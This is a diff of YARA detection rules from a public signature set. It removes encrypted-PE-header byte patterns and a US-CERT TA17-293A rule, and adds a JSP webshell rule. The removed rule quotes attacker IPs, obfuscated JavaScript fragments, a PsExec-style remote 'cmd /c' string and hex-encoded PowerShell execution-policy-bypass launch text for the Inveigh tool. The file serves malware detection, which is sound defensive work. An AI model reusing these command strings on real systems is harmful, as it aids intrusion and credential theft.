-		$encrypted_pe_header_shift_59 = { 37 f4 3b 88 95 cb 3b 3e 3b 3b 3b bd 3f 3b 6b 3a 3a 3b }
-		$encrypted_pe_header_shift_60 = { 38 f5 3c 89 96 cc 3c 3f 3c 3c 3c be 40 3c 6c 3b 3b 3c }
-		$encrypted_pe_header_shift_61 = { 39 f6 3d 8a 97 cd 3d 40 3d 3d 3d bf 41 3d 6d 3c 3c 3d }
-		$encrypted_pe_header_shift_62 = { 3a f7 3e 8b 98 ce 3e 41 3e 3e 3e c0 42 3e 6e 3d 3d 3e }
-		$encrypted_pe_header_shift_63 = { 3b f8 3f 8c 99 cf 3f 42 3f 3f 3f c1 43 3f 6f 3e 3e 3f }
-		$encrypted_pe_header_shift_64 = { 3c f9 40 8d 9a d0 40 43 40 40 40 c2 44 40 70 3f 3f 40 }
-		$encrypted_pe_header_shift_65 = { 3d fa 41 8e 9b d1 41 44 41 41 41 c3 45 41 71 40 40 41 }
-		$encrypted_pe_header_shift_66 = { 3e fb 42 8f 9c d2 42 45 42 42 42 c4 46 42 72 41 41 42 }
-		$encrypted_pe_header_shift_67 = { 3f fc 43 90 9d d3 43 46 43 43 43 c5 47 43 73 42 42 43 }
-		$encrypted_pe_header_shift_68 = { 40 fd 44 91 9e d4 44 47 44 44 44 c6 48 44 74 43 43 44 }
-		$encrypted_pe_header_shift_69 = { 41 fe 45 92 9f d5 45 48 45 45 45 c7 49 45 75 44 44 45 }
-		$encrypted_pe_header_shift_70 = { 42 ff 46 93 a0 d6 46 49 46 46 46 c8 4a 46 76 45 45 46 }
-		$encrypted_pe_header_shift_71 = { 43 00 47 94 a1 d7 47 4a 47 47 47 c9 4b 47 77 46 46 47 }
-		$encrypted_pe_header_shift_72 = { 44 01 48 95 a2 d8 48 4b 48 48 48 ca 4c 48 78 47 47 48 }
-		$encrypted_pe_header_shift_73 = { 45 02 49 96 a3 d9 49 4c 49 49 49 cb 4d 49 79 48 48 49 }
-		$encrypted_pe_header_shift_74 = { 46 03 4a 97 a4 da 4a 4d 4a 4a 4a cc 4e 4a 7a 49 49 4a }
-		$encrypted_pe_header_shift_75 = { 47 04 4b 98 a5 db 4b 4e 4b 4b 4b cd 4f 4b 7b 4a 4a 4b }
-		$encrypted_pe_header_shift_76 = { 48 05 4c 99 a6 dc 4c 4f 4c 4c 4c ce 50 4c 7c 4b 4b 4c }
-		$encrypted_pe_header_shift_77 = { 49 06 4d 9a a7 dd 4d 50 4d 4d 4d cf 51 4d 7d 4c 4c 4d }
-		$encrypted_pe_header_shift_78 = { 4a 07 4e 9b a8 de 4e 51 4e 4e 4e d0 52 4e 7e 4d 4d 4e }
-		$encrypted_pe_header_shift_79 = { 4b 08 4f 9c a9 df 4f 52 4f 4f 4f d1 53 4f 7f 4e 4e 4f }
-		$encrypted_pe_header_shift_80 = { 4c 09 50 9d aa e0 50 53 50 50 50 d2 54 50 80 4f 4f 50 }
-		$encrypted_pe_header_shift_81 = { 4d 0a 51 9e ab e1 51 54 51 51 51 d3 55 51 81 50 50 51 }
-		$encrypted_pe_header_shift_82 = { 4e 0b 52 9f ac e2 52 55 52 52 52 d4 56 52 82 51 51 52 }
-		$encrypted_pe_header_shift_83 = { 4f 0c 53 a0 ad e3 53 56 53 53 53 d5 57 53 83 52 52 53 }
-		$encrypted_pe_header_shift_84 = { 50 0d 54 a1 ae e4 54 57 54 54 54 d6 58 54 84 53 53 54 }
-		$encrypted_pe_header_shift_85 = { 51 0e 55 a2 af e5 55 58 55 55 55 d7 59 55 85 54 54 55 }
-		$encrypted_pe_header_shift_86 = { 52 0f 56 a3 b0 e6 56 59 56 56 56 d8 5a 56 86 55 55 56 }
-		$encrypted_pe_header_shift_87 = { 53 10 57 a4 b1 e7 57 5a 57 57 57 d9 5b 57 87 56 56 57 }
-		$encrypted_pe_header_shift_88 = { 54 11 58 a5 b2 e8 58 5b 58 58 58 da 5c 58 88 57 57 58 }
-		$encrypted_pe_header_shift_89 = { 55 12 59 a6 b3 e9 59 5c 59 59 59 db 5d 59 89 58 58 59 }
-		$encrypted_pe_header_shift_90 = { 56 13 5a a7 b4 ea 5a 5d 5a 5a 5a dc 5e 5a 8a 59 59 5a }
-		$encrypted_pe_header_shift_91 = { 57 14 5b a8 b5 eb 5b 5e 5b 5b 5b dd 5f 5b 8b 5a 5a 5b }
-		$encrypted_pe_header_shift_92 = { 58 15 5c a9 b6 ec 5c 5f 5c 5c 5c de 60 5c 8c 5b 5b 5c }
-		$encrypted_pe_header_shift_93 = { 59 16 5d aa b7 ed 5d 60 5d 5d 5d df 61 5d 8d 5c 5c 5d }
-		$encrypted_pe_header_shift_94 = { 5a 17 5e ab b8 ee 5e 61 5e 5e 5e e0 62 5e 8e 5d 5d 5e }
-		$encrypted_pe_header_shift_95 = { 5b 18 5f ac b9 ef 5f 62 5f 5f 5f e1 63 5f 8f 5e 5e 5f }
-		$encrypted_pe_header_shift_96 = { 5c 19 60 ad ba f0 60 63 60 60 60 e2 64 60 90 5f 5f 60 }
-		$encrypted_pe_header_shift_97 = { 5d 1a 61 ae bb f1 61 64 61 61 61 e3 65 61 91 60 60 61 }
-		$encrypted_pe_header_shift_98 = { 5e 1b 62 af bc f2 62 65 62 62 62 e4 66 62 92 61 61 62 }
-		$encrypted_pe_header_shift_99 = { 5f 1c 63 b0 bd f3 63 66 63 63 63 e5 67 63 93 62 62 63 }
-		$encrypted_pe_header_shift_100 = { 60 1d 64 b1 be f4 64 67 64 64 64 e6 68 64 94 63 63 64 }
-		$encrypted_pe_header_shift_101 = { 61 1e 65 b2 bf f5 65 68 65 65 65 e7 69 65 95 64 64 65 }
-		$encrypted_pe_header_shift_102 = { 62 1f 66 b3 c0 f6 66 69 66 66 66 e8 6a 66 96 65 65 66 }
-		$encrypted_pe_header_shift_103 = { 63 20 67 b4 c1 f7 67 6a 67 67 67 e9 6b 67 97 66 66 67 }
-		$encrypted_pe_header_shift_104 = { 64 21 68 b5 c2 f8 68 6b 68 68 68 ea 6c 68 98 67 67 68 }
-		$encrypted_pe_header_shift_105 = { 65 22 69 b6 c3 f9 69 6c 69 69 69 eb 6d 69 99 68 68 69 }
-		$encrypted_pe_header_shift_106 = { 66 23 6a b7 c4 fa 6a 6d 6a 6a 6a ec 6e 6a 9a 69 69 6a }
-		$encrypted_pe_header_shift_107 = { 67 24 6b b8 c5 fb 6b 6e 6b 6b 6b ed 6f 6b 9b 6a 6a 6b }
-		$encrypted_pe_header_shift_108 = { 68 25 6c b9 c6 fc 6c 6f 6c 6c 6c ee 70 6c 9c 6b 6b 6c }
-		$encrypted_pe_header_shift_109 = { 69 26 6d ba c7 fd 6d 70 6d 6d 6d ef 71 6d 9d 6c 6c 6d }
-		$encrypted_pe_header_shift_110 = { 6a 27 6e bb c8 fe 6e 71 6e 6e 6e f0 72 6e 9e 6d 6d 6e }
-		$encrypted_pe_header_shift_111 = { 6b 28 6f bc c9 ff 6f 72 6f 6f 6f f1 73 6f 9f 6e 6e 6f }
-		$encrypted_pe_header_shift_112 = { 6c 29 70 bd ca 00 70 73 70 70 70 f2 74 70 a0 6f 6f 70 }
-		$encrypted_pe_header_shift_113 = { 6d 2a 71 be cb 01 71 74 71 71 71 f3 75 71 a1 70 70 71 }
-		$encrypted_pe_header_shift_114 = { 6e 2b 72 bf cc 02 72 75 72 72 72 f4 76 72 a2 71 71 72 }
-		$encrypted_pe_header_shift_115 = { 6f 2c 73 c0 cd 03 73 76 73 73 73 f5 77 73 a3 72 72 73 }
-		$encrypted_pe_header_shift_116 = { 70 2d 74 c1 ce 04 74 77 74 74 74 f6 78 74 a4 73 73 74 }
-		$encrypted_pe_header_shift_117 = { 71 2e 75 c2 cf 05 75 78 75 75 75 f7 79 75 a5 74 74 75 }
-		$encrypted_pe_header_shift_118 = { 72 2f 76 c3 d0 06 76 79 76 76 76 f8 7a 76 a6 75 75 76 }
-		$encrypted_pe_header_shift_119 = { 73 30 77 c4 d1 07 77 7a 77 77 77 f9 7b 77 a7 76 76 77 }
-		$encrypted_pe_header_shift_120 = { 74 31 78 c5 d2 08 78 7b 78 78 78 fa 7c 78 a8 77 77 78 }
-		$encrypted_pe_header_shift_121 = { 75 32 79 c6 d3 09 79 7c 79 79 79 fb 7d 79 a9 78 78 79 }
-		$encrypted_pe_header_shift_122 = { 76 33 7a c7 d4 0a 7a 7d 7a 7a 7a fc 7e 7a aa 79 79 7a }
-		$encrypted_pe_header_shift_123 = { 77 34 7b c8 d5 0b 7b 7e 7b 7b 7b fd 7f 7b ab 7a 7a 7b }
-		$encrypted_pe_header_shift_124 = { 78 35 7c c9 d6 0c 7c 7f 7c 7c 7c fe 80 7c ac 7b 7b 7c }
-		$encrypted_pe_header_shift_125 = { 79 36 7d ca d7 0d 7d 80 7d 7d 7d ff 81 7d ad 7c 7c 7d }
-		$encrypted_pe_header_shift_126 = { 7a 37 7e cb d8 0e 7e 81 7e 7e 7e 00 82 7e ae 7d 7d 7e }
-		$encrypted_pe_header_shift_127 = { 7b 38 7f cc d9 0f 7f 82 7f 7f 7f 01 83 7f af 7e 7e 7f }
-		$encrypted_pe_header_shift_128 = { 7c 39 80 cd da 10 80 83 80 80 80 02 84 80 b0 7f 7f 80 }
-		$encrypted_pe_header_shift_129 = { 7d 3a 81 ce db 11 81 84 81 81 81 03 85 81 b1 80 80 81 }
-		$encrypted_pe_header_shift_130 = { 7e 3b 82 cf dc 12 82 85 82 82 82 04 86 82 b2 81 81 82 }
-		$encrypted_pe_header_shift_131 = { 7f 3c 83 d0 dd 13 83 86 83 83 83 05 87 83 b3 82 82 83 }
-		$encrypted_pe_header_shift_132 = { 80 3d 84 d1 de 14 84 87 84 84 84 06 88 84 b4 83 83 84 }
-		$encrypted_pe_header_shift_133 = { 81 3e 85 d2 df 15 85 88 85 85 85 07 89 85 b5 84 84 85 }
-		$encrypted_pe_header_shift_134 = { 82 3f 86 d3 e0 16 86 89 86 86 86 08 8a 86 b6 85 85 86 }
-		$encrypted_pe_header_shift_135 = { 83 40 87 d4 e1 17 87 8a 87 87 87 09 8b 87 b7 86 86 87 }
-		$encrypted_pe_header_shift_136 = { 84 41 88 d5 e2 18 88 8b 88 88 88 0a 8c 88 b8 87 87 88 }
-		$encrypted_pe_header_shift_137 = { 85 42 89 d6 e3 19 89 8c 89 89 89 0b 8d 89 b9 88 88 89 }
-		$encrypted_pe_header_shift_138 = { 86 43 8a d7 e4 1a 8a 8d 8a 8a 8a 0c 8e 8a ba 89 89 8a }
-		$encrypted_pe_header_shift_139 = { 87 44 8b d8 e5 1b 8b 8e 8b 8b 8b 0d 8f 8b bb 8a 8a 8b }
-		$encrypted_pe_header_shift_140 = { 88 45 8c d9 e6 1c 8c 8f 8c 8c 8c 0e 90 8c bc 8b 8b 8c }
-		$encrypted_pe_header_shift_141 = { 89 46 8d da e7 1d 8d 90 8d 8d 8d 0f 91 8d bd 8c 8c 8d }
-		$encrypted_pe_header_shift_142 = { 8a 47 8e db e8 1e 8e 91 8e 8e 8e 10 92 8e be 8d 8d 8e }
-		$encrypted_pe_header_shift_143 = { 8b 48 8f dc e9 1f 8f 92 8f 8f 8f 11 93 8f bf 8e 8e 8f }
-		$encrypted_pe_header_shift_144 = { 8c 49 90 dd ea 20 90 93 90 90 90 12 94 90 c0 8f 8f 90 }
-		$encrypted_pe_header_shift_145 = { 8d 4a 91 de eb 21 91 94 91 91 91 13 95 91 c1 90 90 91 }
-		$encrypted_pe_header_shift_146 = { 8e 4b 92 df ec 22 92 95 92 92 92 14 96 92 c2 91 91 92 }
-		$encrypted_pe_header_shift_147 = { 8f 4c 93 e0 ed 23 93 96 93 93 93 15 97 93 c3 92 92 93 }
-		$encrypted_pe_header_shift_148 = { 90 4d 94 e1 ee 24 94 97 94 94 94 16 98 94 c4 93 93 94 }
-		$encrypted_pe_header_shift_149 = { 91 4e 95 e2 ef 25 95 98 95 95 95 17 99 95 c5 94 94 95 }
-		$encrypted_pe_header_shift_150 = { 92 4f 96 e3 f0 26 96 99 96 96 96 18 9a 96 c6 95 95 96 }
-		$encrypted_pe_header_shift_151 = { 93 50 97 e4 f1 27 97 9a 97 97 97 19 9b 97 c7 96 96 97 }
-		$encrypted_pe_header_shift_152 = { 94 51 98 e5 f2 28 98 9b 98 98 98 1a 9c 98 c8 97 97 98 }
-		$encrypted_pe_header_shift_153 = { 95 52 99 e6 f3 29 99 9c 99 99 99 1b 9d 99 c9 98 98 99 }
-		$encrypted_pe_header_shift_154 = { 96 53 9a e7 f4 2a 9a 9d 9a 9a 9a 1c 9e 9a ca 99 99 9a }
-		$encrypted_pe_header_shift_155 = { 97 54 9b e8 f5 2b 9b 9e 9b 9b 9b 1d 9f 9b cb 9a 9a 9b }
-		$encrypted_pe_header_shift_156 = { 98 55 9c e9 f6 2c 9c 9f 9c 9c 9c 1e a0 9c cc 9b 9b 9c }
-		$encrypted_pe_header_shift_157 = { 99 56 9d ea f7 2d 9d a0 9d 9d 9d 1f a1 9d cd 9c 9c 9d }
-		$encrypted_pe_header_shift_158 = { 9a 57 9e eb f8 2e 9e a1 9e 9e 9e 20 a2 9e ce 9d 9d 9e }
-		$encrypted_pe_header_shift_159 = { 9b 58 9f ec f9 2f 9f a2 9f 9f 9f 21 a3 9f cf 9e 9e 9f }
-		$encrypted_pe_header_shift_160 = { 9c 59 a0 ed fa 30 a0 a3 a0 a0 a0 22 a4 a0 d0 9f 9f a0 }
-		$encrypted_pe_header_shift_161 = { 9d 5a a1 ee fb 31 a1 a4 a1 a1 a1 23 a5 a1 d1 a0 a0 a1 }
-		$encrypted_pe_header_shift_162 = { 9e 5b a2 ef fc 32 a2 a5 a2 a2 a2 24 a6 a2 d2 a1 a1 a2 }
-		$encrypted_pe_header_shift_163 = { 9f 5c a3 f0 fd 33 a3 a6 a3 a3 a3 25 a7 a3 d3 a2 a2 a3 }
-		$encrypted_pe_header_shift_164 = { a0 5d a4 f1 fe 34 a4 a7 a4 a4 a4 26 a8 a4 d4 a3 a3 a4 }
-		$encrypted_pe_header_shift_165 = { a1 5e a5 f2 ff 35 a5 a8 a5 a5 a5 27 a9 a5 d5 a4 a4 a5 }
-		$encrypted_pe_header_shift_166 = { a2 5f a6 f3 00 36 a6 a9 a6 a6 a6 28 aa a6 d6 a5 a5 a6 }
-		$encrypted_pe_header_shift_167 = { a3 60 a7 f4 01 37 a7 aa a7 a7 a7 29 ab a7 d7 a6 a6 a7 }
-		$encrypted_pe_header_shift_168 = { a4 61 a8 f5 02 38 a8 ab a8 a8 a8 2a ac a8 d8 a7 a7 a8 }
-		$encrypted_pe_header_shift_169 = { a5 62 a9 f6 03 39 a9 ac a9 a9 a9 2b ad a9 d9 a8 a8 a9 }
-		$encrypted_pe_header_shift_170 = { a6 63 aa f7 04 3a aa ad aa aa aa 2c ae aa da a9 a9 aa }
-		$encrypted_pe_header_shift_171 = { a7 64 ab f8 05 3b ab ae ab ab ab 2d af ab db aa aa ab }
-		$encrypted_pe_header_shift_172 = { a8 65 ac f9 06 3c ac af ac ac ac 2e b0 ac dc ab ab ac }
-		$encrypted_pe_header_shift_173 = { a9 66 ad fa 07 3d ad b0 ad ad ad 2f b1 ad dd ac ac ad }
-		$encrypted_pe_header_shift_174 = { aa 67 ae fb 08 3e ae b1 ae ae ae 30 b2 ae de ad ad ae }
-		$encrypted_pe_header_shift_175 = { ab 68 af fc 09 3f af b2 af af af 31 b3 af df ae ae af }
-		$encrypted_pe_header_shift_176 = { ac 69 b0 fd 0a 40 b0 b3 b0 b0 b0 32 b4 b0 e0 af af b0 }
-		$encrypted_pe_header_shift_177 = { ad 6a b1 fe 0b 41 b1 b4 b1 b1 b1 33 b5 b1 e1 b0 b0 b1 }
-		$encrypted_pe_header_shift_178 = { ae 6b b2 ff 0c 42 b2 b5 b2 b2 b2 34 b6 b2 e2 b1 b1 b2 }
-		$encrypted_pe_header_shift_179 = { af 6c b3 00 0d 43 b3 b6 b3 b3 b3 35 b7 b3 e3 b2 b2 b3 }
-		$encrypted_pe_header_shift_180 = { b0 6d b4 01 0e 44 b4 b7 b4 b4 b4 36 b8 b4 e4 b3 b3 b4 }
-		$encrypted_pe_header_shift_181 = { b1 6e b5 02 0f 45 b5 b8 b5 b5 b5 37 b9 b5 e5 b4 b4 b5 }
-		$encrypted_pe_header_shift_182 = { b2 6f b6 03 10 46 b6 b9 b6 b6 b6 38 ba b6 e6 b5 b5 b6 }
-		$encrypted_pe_header_shift_183 = { b3 70 b7 04 11 47 b7 ba b7 b7 b7 39 bb b7 e7 b6 b6 b7 }
-		$encrypted_pe_header_shift_184 = { b4 71 b8 05 12 48 b8 bb b8 b8 b8 3a bc b8 e8 b7 b7 b8 }
-		$encrypted_pe_header_shift_185 = { b5 72 b9 06 13 49 b9 bc b9 b9 b9 3b bd b9 e9 b8 b8 b9 }
-		$encrypted_pe_header_shift_186 = { b6 73 ba 07 14 4a ba bd ba ba ba 3c be ba ea b9 b9 ba }
-		$encrypted_pe_header_shift_187 = { b7 74 bb 08 15 4b bb be bb bb bb 3d bf bb eb ba ba bb }
-		$encrypted_pe_header_shift_188 = { b8 75 bc 09 16 4c bc bf bc bc bc 3e c0 bc ec bb bb bc }
-		$encrypted_pe_header_shift_189 = { b9 76 bd 0a 17 4d bd c0 bd bd bd 3f c1 bd ed bc bc bd }
-		$encrypted_pe_header_shift_190 = { ba 77 be 0b 18 4e be c1 be be be 40 c2 be ee bd bd be }
-		$encrypted_pe_header_shift_191 = { bb 78 bf 0c 19 4f bf c2 bf bf bf 41 c3 bf ef be be bf }
-		$encrypted_pe_header_shift_192 = { bc 79 c0 0d 1a 50 c0 c3 c0 c0 c0 42 c4 c0 f0 bf bf c0 }
-		$encrypted_pe_header_shift_193 = { bd 7a c1 0e 1b 51 c1 c4 c1 c1 c1 43 c5 c1 f1 c0 c0 c1 }
-		$encrypted_pe_header_shift_194 = { be 7b c2 0f 1c 52 c2 c5 c2 c2 c2 44 c6 c2 f2 c1 c1 c2 }
-		$encrypted_pe_header_shift_195 = { bf 7c c3 10 1d 53 c3 c6 c3 c3 c3 45 c7 c3 f3 c2 c2 c3 }
-		$encrypted_pe_header_shift_196 = { c0 7d c4 11 1e 54 c4 c7 c4 c4 c4 46 c8 c4 f4 c3 c3 c4 }
-		$encrypted_pe_header_shift_197 = { c1 7e c5 12 1f 55 c5 c8 c5 c5 c5 47 c9 c5 f5 c4 c4 c5 }
-		$encrypted_pe_header_shift_198 = { c2 7f c6 13 20 56 c6 c9 c6 c6 c6 48 ca c6 f6 c5 c5 c6 }
-		$encrypted_pe_header_shift_199 = { c3 80 c7 14 21 57 c7 ca c7 c7 c7 49 cb c7 f7 c6 c6 c7 }
-		$encrypted_pe_header_shift_200 = { c4 81 c8 15 22 58 c8 cb c8 c8 c8 4a cc c8 f8 c7 c7 c8 }
-		$encrypted_pe_header_shift_201 = { c5 82 c9 16 23 59 c9 cc c9 c9 c9 4b cd c9 f9 c8 c8 c9 }
-		$encrypted_pe_header_shift_202 = { c6 83 ca 17 24 5a ca cd ca ca ca 4c ce ca fa c9 c9 ca }
-		$encrypted_pe_header_shift_203 = { c7 84 cb 18 25 5b cb ce cb cb cb 4d cf cb fb ca ca cb }
-		$encrypted_pe_header_shift_204 = { c8 85 cc 19 26 5c cc cf cc cc cc 4e d0 cc fc cb cb cc }
-		$encrypted_pe_header_shift_205 = { c9 86 cd 1a 27 5d cd d0 cd cd cd 4f d1 cd fd cc cc cd }
-		$encrypted_pe_header_shift_206 = { ca 87 ce 1b 28 5e ce d1 ce ce ce 50 d2 ce fe cd cd ce }
-		$encrypted_pe_header_shift_207 = { cb 88 cf 1c 29 5f cf d2 cf cf cf 51 d3 cf ff ce ce cf }
-		$encrypted_pe_header_shift_208 = { cc 89 d0 1d 2a 60 d0 d3 d0 d0 d0 52 d4 d0 00 cf cf d0 }
-		$encrypted_pe_header_shift_209 = { cd 8a d1 1e 2b 61 d1 d4 d1 d1 d1 53 d5 d1 01 d0 d0 d1 }
-		$encrypted_pe_header_shift_210 = { ce 8b d2 1f 2c 62 d2 d5 d2 d2 d2 54 d6 d2 02 d1 d1 d2 }
-		$encrypted_pe_header_shift_211 = { cf 8c d3 20 2d 63 d3 d6 d3 d3 d3 55 d7 d3 03 d2 d2 d3 }
-		$encrypted_pe_header_shift_212 = { d0 8d d4 21 2e 64 d4 d7 d4 d4 d4 56 d8 d4 04 d3 d3 d4 }
-		$encrypted_pe_header_shift_213 = { d1 8e d5 22 2f 65 d5 d8 d5 d5 d5 57 d9 d5 05 d4 d4 d5 }
-		$encrypted_pe_header_shift_214 = { d2 8f d6 23 30 66 d6 d9 d6 d6 d6 58 da d6 06 d5 d5 d6 }
-		$encrypted_pe_header_shift_215 = { d3 90 d7 24 31 67 d7 da d7 d7 d7 59 db d7 07 d6 d6 d7 }
-		$encrypted_pe_header_shift_216 = { d4 91 d8 25 32 68 d8 db d8 d8 d8 5a dc d8 08 d7 d7 d8 }
-		$encrypted_pe_header_shift_217 = { d5 92 d9 26 33 69 d9 dc d9 d9 d9 5b dd d9 09 d8 d8 d9 }
-		$encrypted_pe_header_shift_218 = { d6 93 da 27 34 6a da dd da da da 5c de da 0a d9 d9 da }
-		$encrypted_pe_header_shift_219 = { d7 94 db 28 35 6b db de db db db 5d df db 0b da da db }
-		$encrypted_pe_header_shift_220 = { d8 95 dc 29 36 6c dc df dc dc dc 5e e0 dc 0c db db dc }
-		$encrypted_pe_header_shift_221 = { d9 96 dd 2a 37 6d dd e0 dd dd dd 5f e1 dd 0d dc dc dd }
-		$encrypted_pe_header_shift_222 = { da 97 de 2b 38 6e de e1 de de de 60 e2 de 0e dd dd de }
-		$encrypted_pe_header_shift_223 = { db 98 df 2c 39 6f df e2 df df df 61 e3 df 0f de de df }
-		$encrypted_pe_header_shift_224 = { dc 99 e0 2d 3a 70 e0 e3 e0 e0 e0 62 e4 e0 10 df df e0 }
-		$encrypted_pe_header_shift_225 = { dd 9a e1 2e 3b 71 e1 e4 e1 e1 e1 63 e5 e1 11 e0 e0 e1 }
-		$encrypted_pe_header_shift_226 = { de 9b e2 2f 3c 72 e2 e5 e2 e2 e2 64 e6 e2 12 e1 e1 e2 }
-		$encrypted_pe_header_shift_227 = { df 9c e3 30 3d 73 e3 e6 e3 e3 e3 65 e7 e3 13 e2 e2 e3 }
-		$encrypted_pe_header_shift_228 = { e0 9d e4 31 3e 74 e4 e7 e4 e4 e4 66 e8 e4 14 e3 e3 e4 }
-		$encrypted_pe_header_shift_229 = { e1 9e e5 32 3f 75 e5 e8 e5 e5 e5 67 e9 e5 15 e4 e4 e5 }
-		$encrypted_pe_header_shift_230 = { e2 9f e6 33 40 76 e6 e9 e6 e6 e6 68 ea e6 16 e5 e5 e6 }
-		$encrypted_pe_header_shift_231 = { e3 a0 e7 34 41 77 e7 ea e7 e7 e7 69 eb e7 17 e6 e6 e7 }
-		$encrypted_pe_header_shift_232 = { e4 a1 e8 35 42 78 e8 eb e8 e8 e8 6a ec e8 18 e7 e7 e8 }
-		$encrypted_pe_header_shift_233 = { e5 a2 e9 36 43 79 e9 ec e9 e9 e9 6b ed e9 19 e8 e8 e9 }
-		$encrypted_pe_header_shift_234 = { e6 a3 ea 37 44 7a ea ed ea ea ea 6c ee ea 1a e9 e9 ea }
-		$encrypted_pe_header_shift_235 = { e7 a4 eb 38 45 7b eb ee eb eb eb 6d ef eb 1b ea ea eb }
-		$encrypted_pe_header_shift_236 = { e8 a5 ec 39 46 7c ec ef ec ec ec 6e f0 ec 1c eb eb ec }
-		$encrypted_pe_header_shift_237 = { e9 a6 ed 3a 47 7d ed f0 ed ed ed 6f f1 ed 1d ec ec ed }
-		$encrypted_pe_header_shift_238 = { ea a7 ee 3b 48 7e ee f1 ee ee ee 70 f2 ee 1e ed ed ee }
-		$encrypted_pe_header_shift_239 = { eb a8 ef 3c 49 7f ef f2 ef ef ef 71 f3 ef 1f ee ee ef }
-		$encrypted_pe_header_shift_240 = { ec a9 f0 3d 4a 80 f0 f3 f0 f0 f0 72 f4 f0 20 ef ef f0 }
-		$encrypted_pe_header_shift_241 = { ed aa f1 3e 4b 81 f1 f4 f1 f1 f1 73 f5 f1 21 f0 f0 f1 }
-		$encrypted_pe_header_shift_242 = { ee ab f2 3f 4c 82 f2 f5 f2 f2 f2 74 f6 f2 22 f1 f1 f2 }
-		$encrypted_pe_header_shift_243 = { ef ac f3 40 4d 83 f3 f6 f3 f3 f3 75 f7 f3 23 f2 f2 f3 }
-		$encrypted_pe_header_shift_244 = { f0 ad f4 41 4e 84 f4 f7 f4 f4 f4 76 f8 f4 24 f3 f3 f4 }
-		$encrypted_pe_header_shift_245 = { f1 ae f5 42 4f 85 f5 f8 f5 f5 f5 77 f9 f5 25 f4 f4 f5 }
-		$encrypted_pe_header_shift_246 = { f2 af f6 43 50 86 f6 f9 f6 f6 f6 78 fa f6 26 f5 f5 f6 }
-		$encrypted_pe_header_shift_247 = { f3 b0 f7 44 51 87 f7 fa f7 f7 f7 79 fb f7 27 f6 f6 f7 }
-		$encrypted_pe_header_shift_248 = { f4 b1 f8 45 52 88 f8 fb f8 f8 f8 7a fc f8 28 f7 f7 f8 }
-		$encrypted_pe_header_shift_249 = { f5 b2 f9 46 53 89 f9 fc f9 f9 f9 7b fd f9 29 f8 f8 f9 }
-		$encrypted_pe_header_shift_250 = { f6 b3 fa 47 54 8a fa fd fa fa fa 7c fe fa 2a f9 f9 fa }
-		$encrypted_pe_header_shift_251 = { f7 b4 fb 48 55 8b fb fe fb fb fb 7d ff fb 2b fa fa fb }
-		$encrypted_pe_header_shift_252 = { f8 b5 fc 49 56 8c fc ff fc fc fc 7e 00 fc 2c fb fb fc }
-		$encrypted_pe_header_shift_253 = { f9 b6 fd 4a 57 8d fd 00 fd fd fd 7f 01 fd 2d fc fc fd }
-		$encrypted_pe_header_shift_254 = { fa b7 fe 4b 58 8e fe 01 fe fe fe 80 02 fe 2e fd fd fe }
-		$encrypted_pe_header_shift_255 = { fb b8 ff 4c 59 8f ff 02 ff ff ff 81 03 ff 2f fe fe ff }
+		$s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"
 
 	condition:
-		filesize < 200KB and ( 1 of ( $encrypted_pe_header_shift_* ) )
+		all of them
 }
-rule SIGNATURE_BASE_TA17_293A_Malware_1
+rule SIGNATURE_BASE_Webshell_Jspshell
 {
 	meta:
-		description = "inveigh pen testing tools & related artifacts"
-		author = "US-CERT Code Analysis Team (modified by Florian Roth)"
-		id = "297611c9-f4b1-5618-bd43-5a7444365727"
-		date = "2017-07-17"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L14-L75"
+		description = "Web Shell - file jspShell.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L814-L828"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "408297496dfb1cc28e1caa7faaf8537b7970bb1742e1b373175f8273fe11f19d"
-		score = 50
-		quality = 75
+		hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"
+		logic_hash = "058ddd64b142cada7144b9befa81ada314b72e6f23524d98efcb10136c23ed33"
+		score = 70
+		quality = 85
 		tags = ""
-		hash0 = "61C909D2F625223DB2FB858BBDF42A76"
-		hash1 = "A07AA521E7CAFB360294E56969EDA5D6"
-		hash2 = "BA756DD64C1147515BA2298B6A760260"
-		hash3 = "8943E71A8C73B5E343AA9D2E19002373"
-		hash4 = "04738CA02F59A5CD394998A99FCD9613"
-		hash5 = "038A97B4E2F37F34B255F0643E49FC9D"
-		hash6 = "65A1A73253F04354886F375B59550B46"
-		hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"
-		hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"
-		hash9 = "722154A36F32BA10E98020A8AD758A7A"
-		hash10 = "4595DBE00A538DF127E0079294C87DA0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$n1 = "file://"
-		$ax1 = "184.154.150.66"
-		$ax2 = "5.153.58.45"
-		$ax3 = "62.8.193.206"
-		$ax4 = "/pshare1/icon"
-		$ax5 = "/ame_icon.png"
-		$ax6 = "/1/ree_stat/p"
-		$s1 = "(g.charCodeAt(c)^l[(l[b]+l[e])%256])"
-		$s2 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"
-		$s3 = "VXNESWJfSjY3grKEkEkRuZeSvkE="
-		$s4 = "NlZzSZk="
-		$s5 = "WlJTb1q5kaxqZaRnser3sw=="
-		$x1 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }
-		$x2 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }
-		$x3 = "fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])"
-		$x4 = "ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat"
-		$x5 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }
-		$x6 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 }
